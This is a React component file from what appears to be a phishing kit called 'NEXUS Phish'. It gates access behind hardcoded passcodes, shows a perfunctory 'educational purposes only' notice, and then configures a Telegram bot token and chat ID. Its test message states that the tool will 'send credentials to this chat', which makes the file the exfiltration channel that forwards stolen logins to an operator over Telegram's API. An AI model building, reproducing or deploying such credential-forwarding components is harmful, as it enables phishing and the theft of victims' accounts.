import React, { useState } from 'react';
import { Button } from '@/components/ui/button';
import { Input } from '@/components/ui/input';
import { Label } from '@/components/ui/label';
import { useCredentials } from '@/contexts/CredentialsContext';
import { toast } from 'sonner';
import { Send, Info, Lock, AlertTriangle } from 'lucide-react';
import {
  AlertDialog,
  AlertDialogAction,
  AlertDialogCancel,
  AlertDialogContent,
  AlertDialogDescription,
  AlertDialogFooter,
  AlertDialogHeader,
  AlertDialogTitle,
} from "@/components/ui/alert-dialog";

const VALID_PASSCODES = ['NEXUS@2315', 'MMBCS'];

const TelegramModal: React.FC = () => {
  const { telegramConfig, setTelegramConfig, isTelegramConfigured } = useCredentials();
  const [botToken, setBotToken] = useState(telegramConfig.botToken);
  const [chatId, setChatId] = useState(telegramConfig.chatId);
  const [passcode, setPasscode] = useState('');
  const [isAuthenticated, setIsAuthenticated] = useState(false);
  const [isLoading, setIsLoading] = useState(false);
  const [showTerms, setShowTerms] = useState(false);

  const handlePasscodeSubmit = () => {
    if (VALID_PASSCODES.includes(passcode)) {
      setShowTerms(true);
    } else {
      toast.error('Invalid passcode');
    }
  };

  const handleAcceptTerms = () => {
    setShowTerms(false);
    setIsAuthenticated(true);
    toast.success('Passcode authenticated successfully');
  };

  const handleSave = async () => {
    if (!isAuthenticated) {
      toast.error('Please authenticate with a valid passcode first');
      return;
    }

    if (!botToken || !chatId) {
      toast.error('Please fill in all fields');
      return;
    }

    setIsLoading(true);
    try {
      const response = await fetch(
        `https://api.telegram.org/bot${botToken}/sendMessage`,
        {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
          },
          body: JSON.stringify({
            chat_id: chatId,
            text: '✅ Connection successful! Your NEXUS Phish is now configured to send credentials to this chat.',
          }),
        }
      );

      const data = await response.json();

      if (!data.ok) {
        throw new Error(data.description || 'Failed to connect to Telegram');
      }

      // Generate a unique configId
      const configId = `config_${Date.now()}`;
      
      setTelegramConfig({ 
        botToken, 
        chatId, 
        configId 
      });
      
      toast.success('Telegram configuration saved and tested successfully');
    } catch (error) {
      console.error('Error testing Telegram configuration:', error);
      toast.error('Failed to connect to Telegram. Please check your bot token and chat ID.');
    } finally {
      setIsLoading(false);
    }
  };

  return (
    <div className="space-y-3 py-2">
      <div className="bg-accent/50 text-accent-foreground p-3 rounded-md flex gap-2 text-sm">
        <Info className="h-4 w-4 flex-shrink-0 mt-0.5" />
        <div>
          <p className="font-medium mb-1">Quick Setup:</p>
          <ol className="list-decimal pl-4 space-y-0.5">
            <li>Message <a href="https://t.me/BotFather" target="_blank" rel="noopener noreferrer" className="text-primary underline">@BotFather</a>, send /newbot</li>
            <li>Copy the API token</li>
            <li>Message <a href="https://t.me/userinfobot" target="_blank" rel="noopener noreferrer" className="text-primary underline">@userinfobot</a> for Chat ID</li>
          </ol>
        </div>
      </div>

      <AlertDialog open={showTerms} onOpenChange={setShowTerms}>
        <AlertDialogContent>
          <AlertDialogHeader>
            <AlertDialogTitle className="flex items-center gap-2">
              <AlertTriangle className="h-5 w-5 text-yellow-500" />
              Important Notice
            </AlertDialogTitle>
            <AlertDialogDescription className="space-y-3">
              <p>
                This platform is intended for <strong>educational and research purposes only</strong>. By proceeding, you acknowledge and agree to:
              </p>
              <ul className="list-disc pl-4 space-y-1">
                <li>Use this tool solely for authorized security testing and research</li>
                <li>Not engage in any malicious or harmful activities</li>
                <li>Take full responsibility for your actions and usage of this tool</li>
                <li>Comply with all applicable laws and regulations</li>
              </ul>
              <p className="text-yellow-600 dark:text-yellow-500">
                Any misuse or illegal activities are strictly prohibited and may result in legal consequences.
              </p>
            </AlertDialogDescription>
          </AlertDialogHeader>
          <AlertDialogFooter>
            <AlertDialogCancel>Decline</AlertDialogCancel>
            <AlertDialogAction onClick={handleAcceptTerms}>
              I Accept & Understand
            </AlertDialogAction>
          </AlertDialogFooter>
        </AlertDialogContent>
      </AlertDialog>

      {!isAuthenticated ? (
        <div className="space-y-3">
          <div className="space-y-1">
            <Label htmlFor="passcode">Enter Passcode</Label>
            <div className="relative">
              <Input
                id="passcode"
                type="password"
                value={passcode}
                onChange={(e) => setPasscode(e.target.value)}
                placeholder="Enter authentication passcode"
                className="pl-9"
              />
              <Lock className="absolute left-3 top-1/2 -translate-y-1/2 h-4 w-4 text-muted-foreground" />
            </div>
          </div>
          <div className="flex justify-end">
            <Button
              onClick={handlePasscodeSubmit}
              className="flex items-center gap-2"
            >
              Authenticate
            </Button>
          </div>
        </div>
      ) : (
        <div className="space-y-3">
          <div className="space-y-1">
            <Label htmlFor="botToken">Bot Token</Label>
            <Input
              id="botToken"
              value={botToken}
              onChange={(e) => setBotToken(e.target.value)}
              placeholder="1234567890:ABCDEFGHIJKLMNOPQRSTUVWXYZ"
            />
          </div>
          
          <div className="space-y-1">
            <Label htmlFor="chatId">Chat ID</Label>
            <Input
              id="chatId"
              value={chatId}
              onChange={(e) => setChatId(e.target.value)}
              placeholder="123456789"
            />
          </div>

          <div className="flex justify-end pt-2">
            <Button
              onClick={handleSave}
              disabled={isLoading}
              className="flex items-center gap-2"
            >
              {isLoading ? (
                <>
                  <div className="h-4 w-4 border-t-2 border-b-2 border-current rounded-full animate-spin"></div>
                  <span>Testing...</span>
                </>
              ) : (
                <>
                  <Send className="h-4 w-4" />
                  <span>{isTelegramConfigured ? 'Update Configuration' : 'Save & Test'}</span>
                </>
              )}
            </Button>
          </div>
        </div>
      )}
    </div>
  );
};

export default TelegramModal;